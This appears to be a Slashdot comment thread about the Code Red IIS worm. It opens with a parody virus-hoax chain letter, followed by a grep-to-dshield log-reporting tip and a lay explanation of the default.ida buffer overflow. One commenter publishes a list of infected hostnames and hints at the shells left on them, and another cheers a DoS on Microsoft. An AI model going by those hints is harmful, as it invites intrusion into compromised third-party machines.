It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.
It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.
It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.
"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!
Re:More info on Code Red III (Score:2, Insightful)
The guy does have a point (Score:2, Informative)
Re:Code Red is trying to eat me! (Score:3, Insightful)
As much as I hate Verizon and their bullshit, at least they are trying to do something.
Gotta give em SOME credit
Pretty devestating DoS attack in the making (Score:2)
Let's see just how many boxen we can get slamming MS at once...
Public Logfile - for *Educational* Purposes Only (Score:5, Informative)
I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?
Already got one! [glowingplate.com] Remember, the list, including fully-qualified hostnames [glowingplate.com], is for _educational_ purposes only. I've made it available [glowingplate.com] so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.
If the log hits aren't for you, do the right thing (Score:4, Funny)
It's just common courtesy provided it isn't a competitors site.
So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:
A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.
Re:Code Red 'counter' (Score:2, Informative)
grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org
They use this information to notify the owners of the machines of the infection and to track the progression of the worm.
Re:CodeRed Information (Score:2)
Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.
From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.
Re:Perhaps REAL Damage will Fix the Problem (Score:2)
It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" dosn't work very well with "reincarnation"
Code Red Cannot Be Stopped (Score:2)
Re:Please (Score:4, Flamebait)
One problem.... (Score:3, Insightful)
RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.
Re:Copycats (Score:5, Insightful)
The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.
Thanks for the suggestion (Score:3, Funny)
OK, it will be ready in an hour, just got to build the array handler routine.
Re:Help me out on this one... (Score:5, Informative)
What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.
Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.
Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.